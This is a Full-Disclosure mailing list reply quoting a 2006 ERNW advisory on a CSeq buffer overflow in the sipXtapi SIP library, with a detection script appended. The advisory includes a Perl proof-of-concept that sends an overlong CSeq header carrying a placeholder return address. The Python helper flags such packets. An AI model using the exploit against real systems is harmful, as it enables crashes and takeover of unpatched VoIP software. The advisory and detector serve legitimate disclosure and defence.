is there an official notification from sipX?<br>I don't see any mention of this vulnerability in the changelog<br><br><br><div><span class="gmail_quote">On 7/10/06, <b class="gmail_sendername"><a href="mailto:mozilla@ids-guide.de">
mozilla@ids-guide.de</a></b> <<a href="mailto:mozilla@ids-guide.de">mozilla@ids-guide.de</a>> wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
ERNW Security Advisory 02-2006<br><br>Buffer Overflow in SIP Foundry's SipXtapi<br><br>Author:<br>Michael Thumann <mthumann[at]ernw.de><br>Homepage: <a href="http://www.ernw.de">www.ernw.de</a><br><br>1. Summary:<br>
The sipXtapi library from SIP Foundry contains a buffer overflow when parsing the CSeq field.<br>
This flaw can be used by an attacker to gain control over EIP and execute arbitrary code.<br>
<br>
2. Severity : Critical<br>
<br>
3. Products affected<br>
- sipXtapi: all versions compiled before 24 March 2006<br>
- PingTel products<br>
- AOL Triton<br>
<br>
4. Patch Availability :<br>
A patch is available within the source tree and the affected products of PingTel and AOL have been updated.<br>
<br>
5. Details<br>
Sending a CSeq field value greater than 24 bytes triggers the buffer overflow condition.<br>
<br>
6. Solution<br>
Update the affected products to the actual version.<br>
<br>
7. Time-Line
<br>
20 Mar 2006: Vulnerability reported to vendor<br>
20 Mar 2006: Answer from vendor<br>
24 Mar 2006: Patch available<br>
10 July 2006: Public Disclosure<br>
<br>
8. Exploit<br>
#!/usr/bin/perl<br>
# PoC Exploit By mthumann@ernw.de<br>
# Remote Buffer Overflow in sipXtapi<br>
<br>
use IO::Socket;<br>
#use strict;<br>
<br>
<br>
print "sipXtapi Exploit by Michael Thumann \n\n";<br>
<br>
if (not $ARGV[0]) {<br>
 print "Usage: sipx.pl <host>\n";<br>
exit;}<br>
<br>
$target=$ARGV[0];<br>
my $source ="127.0.0.1";<br>
my $target_port = 5060;<br>
my $user ="bad";<br>
my $eip="\x41\x41\x41\x41";<br>
my $cseq =<br>
"\x31\x31\x35\x37\x39\x32\x30\x38".<br>
"\x39\x32\x33\x37\x33\x31\x36\x31".<br>
"\x39\x35\x34\x32\x33\x35\x37\x30".<br>
$eip;<br>
my $packet =<<END;<br>
INVITE sip:user\@$source SIP/2.0\r<br>
To: <sip:$target:$target_port>\r<br>
Via: SIP/2.0/UDP $target:3277\r<br>
From: "moz"<sip:$target:3277>\r<br>
Call-ID: 3121$target\r<br>
CSeq: $cseq\r<br>
Max-Forwards: 70\r<br>
Contact: <sip:$source:5059>\r<br>
\r<br>
END<br>
<br>
print "Sending Packet to: " . $target . "\n\n";<br>
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));<br>
my $ipaddr = inet_aton($target);<br>
my $sendto = sockaddr_in($target_port,$ipaddr);<br>
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n";<br>
print "Done.\n";<br>
<br>
9. Thanks<br>
We would like to thank the guys from SIP Foundry for working together on this issue in a professional and responsible way.<br>
<br>
10. Disclaimer<br>
The information in this advisory is provided "AS IS" without warranty<br>
of any kind. In no event shall the authors be liable for any damages<br>
whatsoever including direct, indirect, incidental, consequential,<br>
loss of business profits or special damages due to the misuse of any<br>
information provided in this advisory.<br>
<br>
<br>
_______________________________________________<br>
Full-Disclosure - We believe in it.<br>
Charter:
<a href="http://lists.grok.org.uk/full-disclosure-charter.html">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/">http://secunia.com/</a><br></blockquote>
</div><br>
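One way to spot this condition on the wire, as an added example that is not part of the advisory or of sipXtapi: a Python check that parses a SIP request, validates the CSeq header against the RFC 3261 grammar, and flags any value longer than the 24 bytes the advisory names as the trigger length. The sample messages are constructed.

```python
"""Detection helper for the sipXtapi CSeq overflow described above.

Added example, not code from the advisory or the sipXtapi project. It parses a
raw SIP request, finds the CSeq header (RFC 3261: 1*DIGIT LWS Method) and flags
values that are malformed or longer than the advisory's 24-byte trigger length.
"""
import re

CSEQ_MAX_LEN = 24  # advisory: CSeq values > 24 bytes trigger the overflow
_CSEQ_RE = re.compile(r"^(\d{1,10})[ \t]+([A-Za-z]+)$")


def parse_headers(raw: bytes) -> list[tuple[str, str]]:
    """Split a SIP message into lower-cased (name, value) pairs, joining folded lines."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers: list[tuple[str, str]] = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        if line[:1] in (" ", "\t") and headers:  # folded continuation line
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
        elif ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return headers


def check_cseq(raw: bytes) -> dict:
    """Return {'suspicious': bool, 'reason': str} for one SIP request's CSeq."""
    values = [v for n, v in parse_headers(raw) if n == "cseq"]
    if len(values) != 1:
        return {"suspicious": True, "reason": f"{len(values)} CSeq headers present"}
    value = values[0]
    if len(value.encode("latin-1")) > CSEQ_MAX_LEN:
        return {"suspicious": True,
                "reason": f"CSeq length {len(value)} > {CSEQ_MAX_LEN}"}
    if not _CSEQ_RE.match(value):
        return {"suspicious": True, "reason": "CSeq is not 1*DIGIT LWS Method"}
    return {"suspicious": False, "reason": "ok"}


# Constructed sample messages, not captured traffic.
BENIGN = (b"INVITE sip:user@10.0.0.2 SIP/2.0\r\nVia: SIP/2.0/UDP 10.0.0.1:5060\r\n"
          b"From: <sip:a@10.0.0.1>\r\nTo: <sip:user@10.0.0.2>\r\n"
          b"Call-ID: abc@10.0.0.1\r\nCSeq: 1 INVITE\r\nContent-Length: 0\r\n\r\n")
OVERLONG = BENIGN.replace(b"CSeq: 1 INVITE", b"CSeq: " + b"1" * 28)

if __name__ == "__main__":
    for label, msg in (("benign", BENIGN), ("overlong", OVERLONG)):
        print(label, check_cseq(msg))
```

The length check fires before the grammar check so that an oversized value is reported as such even when it is all digits.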